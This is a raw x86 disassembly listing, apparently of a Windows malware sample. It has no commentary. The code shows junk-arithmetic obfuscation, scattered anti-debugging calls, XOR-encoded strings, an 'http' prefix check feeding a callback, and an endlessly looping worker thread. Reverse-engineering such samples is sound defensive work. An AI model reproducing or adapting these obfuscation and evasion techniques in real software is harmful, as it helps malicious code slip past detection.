mov eax, [ebp+var_52608]
push eax
mov edi, [eax]
call dword ptr [edi+0D0h]
mov ebx, eax
call sub_40C764 ; RtlGetLastWin32Error
or ebx, ebx
jz short loc_4070AB
call sub_40C794 ; GetProcessHeap
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov [ebp+var_5269A], 1EB8h
movzx eax, [ebp+var_5269A]
imul eax, 4A7Ch
mov [ebp+var_5269A], ax
jmp loc_40789F
; ---------------------------------------------------------------------------
loc_4070AB: ; CODE XREF: sub_406D2E+348�j
lea eax, [ebp+var_525E4]
push eax
mov eax, [ebp+var_52610]
push eax
mov edi, [eax]
call dword ptr [edi+38h]
mov ebx, eax
mov eax, dword_4423D1
mov [ebp+var_52698], eax
or ebx, ebx
jz short loc_407112
call sub_40C854 ; IsDebuggerPresent
mov eax, [ebp+var_52610]
push eax
mov esi, [eax]
call dword ptr [esi+8]
mov byte ptr [ebp+var_5269A+1], 67h
sub byte ptr [ebp+var_5269A+1], 4Ah
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
lea edi, [ebp+var_5269E]
lea esi, a4yk3 ; "4Yk3"
mov ecx, 5
rep movsb
jmp loc_40789F
; ---------------------------------------------------------------------------
loc_407112: ; CODE XREF: sub_406D2E+2A0�j
; sub_406D2E+39F�j
lea eax, [ebp+var_525EC]
push eax
mov eax, [ebp+var_525E4]
push eax
mov edi, [eax]
call dword ptr [edi+24h]
mov ebx, eax
call sub_40C764 ; RtlGetLastWin32Error
or ebx, ebx
jnz loc_407D88
mov [ebp+var_52609], 0Ah
movzx eax, [ebp+var_52609]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_52609], al
and [ebp+var_21784], 0
jmp loc_40788D
; ---------------------------------------------------------------------------
loc_40715A: ; CODE XREF: sub_406D2E+B6B�j
call sub_40C740 ; GetCurrentThreadId
push 0
call sub_40CBD8
pop ecx
call sub_40C7C4 ; GetTickCount
mov [ebp+var_626A8], 2
mov eax, [ebp+var_21784]
mov [ebp+var_626A0], eax
lea eax, [ebp+var_62694]
push eax
lea esi, [ebp+var_626A8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_626A8]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_525E4]
push edi
mov edi, [edi]
call dword ptr [edi+2Ch]
mov ebx, eax
lea edi, [ebp+var_627BF]
lea esi, aB ; "~"
mov ecx, 3
rep movsb
or ebx, ebx
jnz loc_407887
lea edi, [ebp+var_627C4]
lea esi, aZrsh ; "ZRSH"
mov ecx, 5
rep movsb
and [ebp+var_626AC], 0
lea eax, [ebp+var_626AC]
push eax
push offset dword_447ADC
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov [ebp+var_626B0], 4352h
mov eax, [ebp+var_626B0]
mov edx, eax
add edx, eax
mov [ebp+var_626B0], edx
or ebx, ebx
jnz loc_407585
lea eax, [ebp+var_626B4]
push eax
mov eax, [ebp+var_626AC]
push eax
mov edi, [eax]
call dword ptr [edi+0F0h]
mov ebx, eax
lea edi, [ebp+var_627CA]
lea esi, aTxnve ; "TxNe"
mov ecx, 3
rep movsw
or ebx, ebx
jnz loc_407585
mov ax, word_4423E8
mov [ebp+var_627CC], ax
lea edi, [ebp+var_627D3]
lea esi, aK80vdo ; "k80Do"
mov ecx, 7
rep movsb
lea eax, [ebp+var_62677]
push eax
push [ebp+var_626B4]
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_6268C], edi
call sub_40C764 ; RtlGetLastWin32Error
and [ebp+var_52674], 0
jmp short loc_4072D8
; ---------------------------------------------------------------------------
loc_4072AF: ; CODE XREF: sub_406D2E+5B6�j
mov eax, [ebp+var_52674]
mov al, [ebp+eax+var_62677]
cmp al, 0Dh
jz short loc_4072C4
cmp al, 0Ah
jnz short loc_4072D2
loc_4072C4: ; CODE XREF: sub_406D2E+590�j
mov eax, [ebp+var_52674]
mov [ebp+eax+var_62677], 0
loc_4072D2: ; CODE XREF: sub_406D2E+594�j
inc [ebp+var_52674]
loc_4072D8: ; CODE XREF: sub_406D2E+57F�j
mov eax, [ebp+var_6268C]
cmp [ebp+var_52674], eax
jb short loc_4072AF
call sub_40C7D0 ; GetVersion
cmp [ebp+var_524CC], 0FFFFFFFFh
jnz short loc_40733F
lea edi, [ebp+var_627DC+3]
lea esi, a8vs ; "8VS^&"
mov ecx, 3
rep movsw
push 11h
push offset aNPVE ; "лإ"
call sub_406CA2
push [ebp+var_21784]
push eax
lea edi, [ebp+var_627B3]
push edi
call sub_40CC50
lea eax, [ebp+var_627B3]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CC74
add esp, 1Ch
jmp short loc_4073AB
; ---------------------------------------------------------------------------
loc_40733F: ; CODE XREF: sub_406D2E+5C4�j
mov word ptr [ebp+var_627D8+2], 41D1h
add word ptr [ebp+var_627D8+2], 3FCCh
push 13h
push offset aPVEPVE ; "إлإ"
call sub_406CA2
push [ebp+var_21784]
push [ebp+var_524CC]
push eax
lea edi, [ebp+var_627B3]
push edi
call sub_40CC50
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp+var_627B3]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CC74
add esp, 20h
mov [ebp+var_627D4], 0C9h
movzx eax, [ebp+var_627D4]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_627D4], al
loc_4073AB: ; CODE XREF: sub_406D2E+60F�j
and [ebp+var_52674], 0
loc_4073B2: ; CODE XREF: sub_406D2E+731�j
mov eax, [ebp+var_52674]
lea ecx, [ebp+eax+var_62677]
or eax, 0FFFFFFFFh
loc_4073C2: ; CODE XREF: sub_406D2E+699�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4073C2
mov [ebp+var_62680], eax
cmp eax, 0
jz short loc_4073DB
cmp eax, 0C8h
jbe short loc_4073DD
loc_4073DB: ; CODE XREF: sub_406D2E+6A4�j
jmp short loc_407446
; ---------------------------------------------------------------------------
loc_4073DD: ; CODE XREF: sub_406D2E+6AB�j
cmp [ebp+var_62680], 1
jnz short loc_4073F6
mov eax, [ebp+var_52674]
cmp [ebp+eax+var_62677], 20h
jz short loc_407446
loc_4073F6: ; CODE XREF: sub_406D2E+6B6�j
call sub_40C740 ; GetCurrentThreadId
push 1
push offset aB_0 ; ""
call sub_406CA2
push eax
lea edi, [ebp+var_10001]
push edi
call sub_40CC74
call sub_40C794 ; GetProcessHeap
mov eax, [ebp+var_52674]
lea eax, [ebp+eax+var_62677]
push eax
lea eax, [ebp+var_10001]
push eax
call sub_40CC74
add esp, 18h
mov [ebp+var_627B8], 60E9h
inc [ebp+var_627B8]
loc_407446: ; CODE XREF: sub_406D2E:loc_4073DB�j
; sub_406D2E+6C6�j
mov eax, [ebp+var_62680]
inc eax
add [ebp+var_52674], eax
mov eax, [ebp+var_6268C]
cmp [ebp+var_52674], eax
jb loc_4073B2
mov [ebp+var_627B9], 0B2h
movzx eax, [ebp+var_627B9]
imul eax, 2A9Dh
mov [ebp+var_627B9], al
and [ebp+var_62688], 0
lea ecx, [ebp+var_10001]
or eax, 0FFFFFFFFh
loc_40748F: ; CODE XREF: sub_406D2E+766�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_40748F
mov [ebp+var_62680], eax
mov [ebp+var_52674], 0
jmp loc_407565
; ---------------------------------------------------------------------------
loc_4074AB: ; CODE XREF: sub_406D2E+843�j
mov word ptr [ebp+var_627D8+2], 6673h
movzx eax, word ptr [ebp+var_627D8+2]
mov edx, eax
add edx, eax
mov eax, edx
mov word ptr [ebp+var_627D8+2], ax
mov eax, [ebp+var_52674]
cmp [ebp+eax+var_10001], 20h
jz short loc_4074DF
and [ebp+var_6267C], 0
loc_4074DF: ; CODE XREF: sub_406D2E+7A8�j
mov word ptr [ebp+var_627D8], 5E3Bh
add word ptr [ebp+var_627D8], 7D94h
cmp [ebp+var_6267C], 0
jnz short loc_407540
mov [ebp+var_627DC], 7B77h
mov eax, 51B3h
mul [ebp+var_627DC]
mov [ebp+var_627E0], eax
mov [ebp+var_627DC], eax
mov eax, [ebp+var_62688]
mov edx, [ebp+var_52674]
mov dl, [ebp+edx+var_10001]
mov [ebp+eax+var_10001], dl
call sub_40C854 ; IsDebuggerPresent
inc [ebp+var_62688]
loc_407540: ; CODE XREF: sub_406D2E+7CA�j
mov eax, [ebp+var_52674]
cmp [ebp+eax+var_10001], 20h
jnz short loc_40755A
mov [ebp+var_6267C], 1
loc_40755A: ; CODE XREF: sub_406D2E+820�j
call sub_40C854 ; IsDebuggerPresent
inc [ebp+var_52674]
loc_407565: ; CODE XREF: sub_406D2E+778�j
mov eax, [ebp+var_62680]
cmp [ebp+var_52674], eax
jb loc_4074AB
mov eax, [ebp+var_62688]
mov [ebp+eax+var_10001], 0
loc_407585: ; CODE XREF: sub_406D2E+4FB�j
; sub_406D2E+52F�j
and [ebp+var_62684], 0
lea eax, [ebp+var_62684]
push eax
push offset dword_447AEC
mov eax, [ebp+var_62694]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C7C4 ; GetTickCount
or ebx, ebx
jnz loc_407855
call sub_40C794 ; GetProcessHeap
lea eax, [ebp+var_62690]
push eax
mov eax, [ebp+var_62684]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
or ebx, ebx
jnz loc_407832
and [ebp+var_52678], 0
jmp loc_407819
; ---------------------------------------------------------------------------
loc_4075E5: ; CODE XREF: sub_406D2E+AF7�j
call sub_40C794 ; GetProcessHeap
push 0
call sub_40CBD8
pop ecx
mov [ebp+var_627F0], 2
mov eax, [ebp+var_52678]
mov [ebp+var_627E8], eax
lea eax, [ebp+var_627DC]
push eax
lea esi, [ebp+var_627F0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_627F0]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_62684]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
or ebx, ebx
jnz loc_407813
call sub_40C794 ; GetProcessHeap
and [ebp+var_627D8], 0
lea eax, [ebp+var_627D8]
push eax
push offset dword_447ADC
mov eax, [ebp+var_627DC]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
call sub_40C764 ; RtlGetLastWin32Error
or ebx, ebx
jnz loc_4077E1
mov [ebp+var_62804], 1DE4h
sub [ebp+var_62804], 0BA1h
cmp [ebp+var_627D8], 0
jz loc_4077E1
mov [ebp+var_62806], 1B0Fh
sub [ebp+var_62806], 4876h
lea eax, [ebp+var_62800]
push eax
push 0
push [ebp+var_10FA8]
mov eax, [ebp+var_627D8]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
call sub_40C734 ; GetCurrentProcessId
or ebx, ebx
jnz loc_4077E1
mov eax, dword_4423F7
mov [ebp+var_62810], eax
cmp [ebp+var_62800], 8
jnz loc_4077E1
movzx edi, [ebp+var_2]
mov esi, [ebp+var_627D8]
mov [ebp+edi*4+var_10FA4], esi
movzx edi, [ebp+var_2]
mov esi, [ebp+var_52678]
mov [ebp+edi*2+var_1177C], si
lea eax, [ebp+var_62800]
push eax
push 0
push [ebp+var_10FAC]
mov eax, [ebp+var_627D8]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
mov [ebp+var_62808], 3C9Dh
movzx eax, [ebp+var_62808]
imul eax, 22A9h
mov [ebp+var_62808], ax
or ebx, ebx
jnz loc_4077DD
call sub_40C764 ; RtlGetLastWin32Error
mov ax, word_4423FB
mov [ebp+var_63816], ax
lea edi, [ebp+var_6381C]
lea esi, aLbn?b ; "lbn?"
mov ecx, 3
rep movsw
lea eax, [ebp+var_6380F]
push eax
push [ebp+var_627F8]
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_63814], edi
call sub_40C764 ; RtlGetLastWin32Error
cmp [ebp+var_6380F], 0
jz short loc_4077CC
cmp edi, 64h
jnb short loc_4077CC
lea eax, [ebp+var_6380F]
push eax
movzx eax, [ebp+var_2]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
call sub_40C6D8
loc_4077CC: ; CODE XREF: sub_406D2E+A7C�j
; sub_406D2E+A81�j
lea edi, [ebp+var_6381D]
lea esi, byte_442403
xor ecx, ecx
inc ecx
rep movsb
loc_4077DD: ; CODE XREF: sub_406D2E+A26�j
inc [ebp+var_2]
loc_4077E1: ; CODE XREF: sub_406D2E+94B�j
; sub_406D2E+96C�j ...
cmp [ebp+var_627D8], 0
jz short $+2
mov [ebp+var_6280C], 346Bh
sub [ebp+var_6280C], 3A2Ah
cmp [ebp+var_627DC], 0
jz short loc_407813
mov eax, [ebp+var_627DC]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407813: ; CODE XREF: sub_406D2E+914�j
; sub_406D2E+AD7�j
inc [ebp+var_52678]
loc_407819: ; CODE XREF: sub_406D2E+8B2�j
mov eax, [ebp+var_62690]
cmp [ebp+var_52678], eax
jb loc_4075E5
jmp short loc_407887
; ---------------------------------------------------------------------------
call sub_40C734 ; GetCurrentProcessId
loc_407832: ; CODE XREF: sub_406D2E+8A5�j
cmp [ebp+var_62684], 0
jz short loc_407847
mov eax, [ebp+var_62684]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407847: ; CODE XREF: sub_406D2E+B0B�j
mov [ebp+var_627BA], 0F2h
sub [ebp+var_627BA], 5Dh
loc_407855: ; CODE XREF: sub_406D2E+883�j
cmp [ebp+var_62694], 0
jz short loc_40786A
mov eax, [ebp+var_62694]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_40786A: ; CODE XREF: sub_406D2E+B2E�j
mov [ebp+var_627BC], 143Bh
movzx eax, [ebp+var_627BC]
imul eax, 22Eh
mov [ebp+var_627BC], ax
loc_407887: ; CODE XREF: sub_406D2E+4A1�j
; sub_406D2E+AFD�j
inc [ebp+var_21784]
loc_40788D: ; CODE XREF: sub_406D2E+427�j
mov eax, [ebp+var_525EC]
cmp [ebp+var_21784], eax
jb loc_40715A
loc_40789F: ; CODE XREF: sub_406D2E+28C�j
; sub_406D2E+309�j ...
inc [ebp+var_524CC]
mov eax, [ebp+var_52640]
cmp [ebp+var_524CC], eax
jl loc_406F67
lea edi, [ebp+var_52656]
lea esi, asc_442404 ; "h<"
mov ecx, 3
rep movsb
loc_4078CA: ; CODE XREF: sub_406D2E+D09�j
push 0
call sub_40CBD8
pop ecx
call sub_40C7C4 ; GetTickCount
mov [ebp+var_21786], 0
jmp loc_4079DF
; ---------------------------------------------------------------------------
loc_4078E5: ; CODE XREF: sub_406D2E+CBE�j
mov [ebp+var_62674], 78C0h
sub [ebp+var_62674], 6288h
lea eax, [ebp+var_524E0]
push eax
push 0
push [ebp+var_10FA8]
movzx edi, [ebp+var_21786]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+20h]
mov ebx, eax
mov dword ptr [ebp-62678h], 2EABh
mov eax, 693Bh
mul dword ptr [ebp-62678h]
mov [ebp+var_62690], eax
mov [ebp-62678h], eax
or ebx, ebx
jnz loc_4079D8
lea edi, [ebp+var_62688+3]
lea esi, byte_442407
xor ecx, ecx
inc ecx
rep movsb
mov eax, dword_442408
mov [ebp+var_6268C+3], eax
lea eax, [ebp+var_6266D]
push eax
push [ebp+var_524D8]
call sub_4068C1
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_62684], edi
mov [ebp+var_6267C], 17FCh
inc [ebp+var_6267C]
cmp [ebp+var_6266D], 0
jz short loc_4079D8
mov word ptr [ebp+var_62680+2], 2AD9h
sub word ptr [ebp+var_62680+2], 258Eh
cmp [ebp+var_62684], 64h
jnb short loc_4079D3
lea eax, [ebp+var_6266D]
push eax
movzx eax, [ebp+var_21786]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
call sub_40C6D8
loc_4079D3: ; CODE XREF: sub_406D2E+C85�j
call sub_40C7C4 ; GetTickCount
loc_4079D8: ; CODE XREF: sub_406D2E+C13�j
; sub_406D2E+C6A�j
inc [ebp+var_21786]
loc_4079DF: ; CODE XREF: sub_406D2E+BB2�j
movzx eax, [ebp+var_21786]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_4078E5
lea eax, [ebp+var_525FE]
push eax
mov eax, dword_442370
push eax
mov edi, [eax]
call dword ptr [edi+7Ch]
mov ebx, eax
mov [ebp+var_52624], 370Ah
inc [ebp+var_52624]
or ebx, ebx
jnz loc_407E02
lea edi, [ebp+var_52657]
lea esi, byte_44240C
xor ecx, ecx
inc ecx
rep movsb
cmp [ebp+var_525FE], 0
jz loc_4078CA
call sub_40C734 ; GetCurrentProcessId
lea edi, [ebp+var_5265D]
lea esi, a1o8qz ; "1o8QZ"
mov ecx, 3
rep movsw
mov [ebp+var_2177D], 0
push offset byte_41FB10
lea eax, [ebp+var_2177D]
push eax
call sub_40C6D8
mov [ebp+var_525E8], 1
mov [ebp+var_1177E], 0
jmp loc_407B63
; ---------------------------------------------------------------------------
loc_407A86: ; CODE XREF: sub_406D2E+E42�j
call sub_40C7C4 ; GetTickCount
movzx eax, [ebp+var_1177E]
imul eax, 64h
cmp [ebp+eax+var_524C8], 0
jz loc_407B5C
call sub_40C734 ; GetCurrentProcessId
and [ebp+var_525E8], 0
push 4
push offset aE ; "إ"
call sub_406CA2
movzx edi, [ebp+var_1177E]
push edi
push eax
lea edi, [ebp+var_525DF]
push edi
call sub_40CC50
lea eax, [ebp+var_525DF]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CC74
lea edi, [ebp+var_52674]
lea esi, aKbX0 ; "k*x0"
mov ecx, 3
rep movsw
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_39E28]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CC74
push 1
push offset asc_446ECD ; ""
call sub_406CA2
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CC74
mov ax, word_442419
mov word ptr [ebp+var_52678+2], ax
movzx eax, [ebp+var_1177E]
imul eax, 64h
lea eax, [ebp+eax+var_524C8]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CC74
add esp, 3Ch
loc_407B5C: ; CODE XREF: sub_406D2E+D6F�j
inc [ebp+var_1177E]
loc_407B63: ; CODE XREF: sub_406D2E+D53�j
movzx eax, [ebp+var_1177E]
movzx edx, [ebp+var_2]
cmp eax, edx
jl loc_407A86
cmp [ebp+var_525E8], 0
jnz loc_407D88
lea edi, [ebp+var_52663]
lea esi, aJvjm ; "JvjM "
mov ecx, 3
rep movsw
push 1
push offset asc_446ECB ; ""
call sub_406CA2
push eax
lea edi, [ebp+var_2177D]
push edi
call sub_40CC74
call sub_40C734 ; GetCurrentProcessId
lea eax, [ebp+var_10001]
push eax
lea eax, [ebp+var_2177D]
push eax
call sub_40CC74
add esp, 18h
mov eax, dword_442421
mov [ebp+var_52667], eax
cmp ds:byte_41FB10, 68h
jnz short loc_407BFA
cmp ds:byte_41FB11, 74h
jnz short loc_407BFA
cmp ds:byte_41FB12, 74h
jnz short loc_407BFA
cmp ds:byte_41FB13, 70h
jz short loc_407BFF
loc_407BFA: ; CODE XREF: sub_406D2E+EAF�j
; sub_406D2E+EB8�j ...
jmp loc_407D3D
; ---------------------------------------------------------------------------
loc_407BFF: ; CODE XREF: sub_406D2E+ECA�j
call sub_40C7D0 ; GetVersion
push 8
push offset aTtSs ; "Ӛ"
call sub_406CA2
mov edi, 9
sub edi, dword_4423A4
push edi
push eax
push offset byte_41FB10
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jz short loc_407C62
push 0Eh
push offset aTtSsSkPs ; "ӚӜ"
call sub_406CA2
mov edi, 9
sub edi, dword_4423A4
push edi
push eax
push offset byte_41FB10
call sub_40181A
add esp, 14h
cmp eax, 0FFFFh
jz loc_407D3D
loc_407C62: ; CODE XREF: sub_406D2E+F01�j
call sub_40C740 ; GetCurrentThreadId
mov [ebp+var_525EE], 0
loc_407C70: ; CODE XREF: sub_406D2E+FE1�j
mov eax, 13h
sub eax, dword_4423A8
push eax
movzx eax, [ebp+var_525EE]
lea eax, ds:4423B4h[eax]
push eax
push offset byte_41FB10
call sub_40181A
add esp, 0Ch
cmp eax, 0FFFFh
jz short loc_407CB8
call sub_40C7D0 ; GetVersion
push 1
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F1D8
jmp loc_407D3D
; ---------------------------------------------------------------------------
loc_407CB8: ; CODE XREF: sub_406D2E+F6F�j
movzx eax, [ebp+var_525EE]
mov [ebp+var_52674], eax
lea ecx, ds:4423B4h[eax]
or eax, 0FFFFFFFFh
loc_407CCF: ; CODE XREF: sub_406D2E+FA6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407CCF
mov esi, [ebp+var_52674]
add esi, eax
mov edi, esi
mov [ebp+var_525EE], di
mov [ebp+var_52626], 4EA9h
add [ebp+var_52626], 266Bh
inc [ebp+var_525EE]
movzx eax, [ebp+var_525EE]
cmp byte_4423B4[eax], 0
jnz loc_407C70
call sub_40C740 ; GetCurrentThreadId
push 0
lea eax, [ebp+var_2177D]
push eax
call ds:dword_40F1D8
lea edi, [ebp+var_5266D]
lea esi, aG5ah ; "'G5aH"
mov ecx, 3
rep movsw
loc_407D3D: ; CODE XREF: sub_406D2E:loc_407BFA�j
; sub_406D2E+F2E�j ...
mov [ebp+var_21788], 0
jmp short loc_407D74
; ---------------------------------------------------------------------------
loc_407D48: ; CODE XREF: sub_406D2E+1053�j
movzx edi, [ebp+var_21788]
cmp [ebp+edi*4+var_10FA4], 0
jz short loc_407D6D
movzx edi, [ebp+var_21788]
mov edi, [ebp+edi*4+var_10FA4]
push edi
mov edi, [edi]
call dword ptr [edi+8]
loc_407D6D: ; CODE XREF: sub_406D2E+1029�j
inc [ebp+var_21788]
loc_407D74: ; CODE XREF: sub_406D2E+1018�j
movzx eax, [ebp+var_21788]
movzx edx, [ebp+var_2]
cmp eax, edx
jl short loc_407D48
call sub_40C7D0 ; GetVersion
loc_407D88: ; CODE XREF: sub_406D2E+400�j
; sub_406D2E+E4F�j
cmp [ebp+var_525E4], 0
jz short loc_407D9D
mov eax, [ebp+var_525E4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407D9D: ; CODE XREF: sub_406D2E+1061�j
mov [ebp+var_5262C], 522Eh
inc [ebp+var_5262C]
cmp [ebp+var_52610], 0
jz short loc_407DC2
mov eax, [ebp+var_52610]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407DC2: ; CODE XREF: sub_406D2E+1086�j
call sub_40C794 ; GetProcessHeap
cmp [ebp+var_52608], 0
jz short loc_407DDC
mov eax, [ebp+var_52608]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407DDC: ; CODE XREF: sub_406D2E+10A0�j
lea edi, [ebp+var_5266E]
lea esi, byte_44242B
xor ecx, ecx
inc ecx
rep movsb
loc_407DED: ; CODE XREF: sub_406D2E+227�j
cmp [ebp+var_52604], 0
jz short loc_407E02
mov eax, [ebp+var_52604]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407E02: ; CODE XREF: sub_406D2E+130�j
; sub_406D2E+181�j ...
cmp [ebp+var_525FC], 0
jz short loc_407E17
mov eax, [ebp+var_525FC]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407E17: ; CODE XREF: sub_406D2E+10DB�j
mov [ebp+var_5262D], 0FDh
add [ebp+var_5262D], 1
loc_407E25: ; CODE XREF: sub_406D2E+101�j
cmp [ebp+var_525F4], 0
jz short loc_407E3A
mov eax, [ebp+var_525F4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_407E3A: ; CODE XREF: sub_406D2E+10FE�j
call sub_40C7D0 ; GetVersion
jmp loc_406D95
; ---------------------------------------------------------------------------
loc_407E44: ; CODE XREF: sub_406D2E+5C�j
pop edi
pop esi
pop ebx
leave
retn
sub_406D2E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407E49 proc near ; DATA XREF: sub_407F07+2C�o
var_20 = dword ptr -20h
var_1A = byte ptr -1Ah
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_44242C
push offset sub_40109A
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 10h
push ebx
push esi
push edi
mov [ebp+var_18], esp
call sub_40C740 ; GetCurrentThreadId
mov [ebp+var_4], 0
mov [ebp+var_19], 9
movzx edi, [ebp+var_19]
mov esi, edi
add esi, edi
mov ebx, esi
mov [ebp+var_19], bl
loc_407E8C: ; CODE XREF: sub_407E49+83�j
; sub_407E49+A3�j
mov [ebp+var_1A], 0DFh
movzx edi, [ebp+var_1A]
mov esi, edi
add esi, edi
mov ebx, esi
mov [ebp+var_1A], bl
mov edi, dword_4423A4
add edi, 1ECh
push edi
call sub_40CBD8
add esp, 4
call sub_406D2E
mov [ebp+var_20], 12EBh
add [ebp+var_20], 59A8h
cmp dword_4423B0, 0
jnz short loc_407E8C
jmp short loc_407EF5
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_407EF5
; ---------------------------------------------------------------------------
mov dword ptr [ebp-1Ch], 1
mov eax, [ebp-1Ch]
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
call sub_40C7D0 ; GetVersion
jmp short loc_407E8C
; ---------------------------------------------------------------------------
mov [ebp+var_4], 0FFFFFFFFh
loc_407EF5: ; CODE XREF: sub_407E49+85�j
; sub_407E49+8E�j
pop edi
pop esi
pop ebx
xchg eax, ecx
mov eax, [ebp+var_10]
mov large fs:0, eax
xchg eax, ecx
leave
retn 4
sub_407E49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407F07 proc near ; CODE XREF: sub_40AA24+7F9�p
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lea edi, [ebp+var_2]
lea esi, dword_442438
xor ecx, ecx
inc ecx
rep movsb
mov eax, [ebp+arg_0]
mov ds:dword_40F1D8, eax
mov ebx, 6DB8h
inc ebx
push offset dword_4423B0
push 0
push 0
push offset sub_407E49
push 0
push 0
call sub_40C980 ; CreateThread
mov ebx, eax
mov [ebp+var_1], 0E3h
add [ebp+var_1], 63h
push ebx
call sub_40C7AC ; CloseHandle
call sub_40C7D0 ; GetVersion
pop edi
pop esi
pop ebx
leave
retn
sub_407F07 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push edi
call sub_40C7D0 ; GetVersion
cmp dword_442370, 0
jnz short loc_407F71
xor eax, eax
jmp short loc_407FB9
; ---------------------------------------------------------------------------
loc_407F71: ; CODE XREF: .text:00407F6B�j
call sub_40C764 ; RtlGetLastWin32Error
mov eax, ds:dword_42FB14
cmp [ebp+8], eax
jz short loc_407F84
xor eax, eax
jmp short loc_407FB9
; ---------------------------------------------------------------------------
loc_407F84: ; CODE XREF: .text:00407F7E�j
call sub_40C734 ; GetCurrentProcessId
lea ecx, byte_41FB10
or eax, 0FFFFFFFFh
loc_407F92: ; CODE XREF: .text:00407F97�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_407F92
mov edi, eax
add edi, 1
push edi
push offset byte_41FB10
push dword ptr [ebp+0Ch]
call sub_40CC14
add esp, 0Ch
call sub_40C854 ; IsDebuggerPresent
mov eax, 1
loc_407FB9: ; CODE XREF: .text:00407F6F�j
; .text:00407F82�j
pop edi
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_407FBC proc near ; CODE XREF: sub_408048+22E�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+arg_4]
push esi
push [ebp+arg_0]
mov eax, dword_442444
lea eax, ds:415580h[eax]
push eax
call sub_40CC14
add esp, 0Ch
mov [ebp+var_4], 0D2h
xor edi, edi
jmp short loc_408003
; ---------------------------------------------------------------------------
loc_407FE9: ; CODE XREF: sub_407FBC+49�j
mov eax, dword_442444
add eax, edi
lea eax, ds:415580h[eax]
movsx edx, byte ptr [eax]
xor edx, 0FDh
mov [eax], dl
inc edi
loc_408003: ; CODE XREF: sub_407FBC+2B�j
cmp edi, esi
jl short loc_407FE9
mov eax, dword_442444
add eax, esi
mov byte ptr ds:dword_415580[eax], 0
mov edi, dword_442444
add dword_442444, 3
mov eax, dword_442444
inc eax
add eax, esi
mov dword_442444, eax
cmp eax, 0DC5h
jle short loc_40803E
and dword_442444, 0
loc_40803E: ; CODE XREF: sub_407FBC+79�j
lea eax, dword_415580[edi]
pop edi
pop esi
leave
retn
sub_407FBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_408048 proc near ; DATA XREF: sub_40AA24+7F4�o
var_2A = byte ptr -2Ah
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_9 = byte ptr -9
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2Ch
push ebx
push esi
push edi
mov [ebp+var_13], 0BEh
add [ebp+var_13], 3Fh
and [ebp+var_4], 0
and [ebp+var_8], 0
and [ebp+var_10], 0
